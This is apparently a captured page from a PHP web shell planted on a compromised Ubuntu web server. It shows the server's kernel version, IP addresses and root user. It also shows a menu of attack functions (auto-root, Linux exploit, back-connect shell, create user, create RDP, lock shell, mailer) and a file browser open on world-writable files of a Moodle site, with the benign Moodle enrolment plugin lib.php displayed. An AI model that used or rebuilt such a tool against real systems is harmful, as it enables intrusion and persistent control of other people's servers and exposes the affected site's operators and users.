Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
enrol /
mnet /
[ HOME SHELL ]
Name
Size
Permission
Action
db
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
addinstance.php
2.64
KB
-rwxrwxrwx
addinstance_form.php
3.24
KB
-rwxrwxrwx
enrol.php
14.63
KB
-rwxrwxrwx
lib.php
3.19
KB
-rwxrwxrwx
settings.php
1.68
KB
-rwxrwxrwx
version.php
1.16
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lib.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * MNet enrolment plugin * * @package enrol_mnet * @copyright 2010 David Mudrak <david@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); /** * MNet enrolment plugin implementation for Moodle 2.x enrolment framework */ class enrol_mnet_plugin extends enrol_plugin { /** * Returns localised name of enrol instance * * @param object|null $instance enrol_mnet instance * @return string */ public function get_instance_name($instance) { global $DB; if (empty($instance)) { $enrol = $this->get_name(); return get_string('pluginname', 'enrol_'.$enrol); } else if (empty($instance->name)) { $enrol = $this->get_name(); if ($role = $DB->get_record('role', array('id'=>$instance->roleid))) { $role = role_get_name($role, context_course::instance($instance->courseid, IGNORE_MISSING)); } else { $role = get_string('error'); } if (empty($instance->customint1)) { $host = get_string('remotesubscribersall', 'enrol_mnet'); } else { $host = $DB->get_field('mnet_host', 'name', array('id'=>$instance->customint1)); } return get_string('pluginname', 'enrol_'.$enrol) . ' (' . format_string($host) . ' - ' . $role .')'; } else { return format_string($instance->name); } } /** * Returns link to page which may be used to add new instance of enrolment plugin into the course * * The link is returned only if there are some MNet peers that we publish enrolment service to. * * @param int $courseid id of the course to add the instance to * @return moodle_url|null page url or null if instance can not be created */ public function get_newinstance_link($courseid) { global $CFG, $DB; require_once($CFG->dirroot.'/mnet/service/enrol/locallib.php'); $service = mnetservice_enrol::get_instance(); if (!$service->is_available()) { return null; } $coursecontext = context_course::instance($courseid); if (!has_capability('moodle/course:enrolconfig', $coursecontext)) { return null; } $subscribers = $service->get_remote_subscribers(); if (empty($subscribers)) { return null; } return new moodle_url('/enrol/mnet/addinstance.php', array('id'=>$courseid)); } }
Close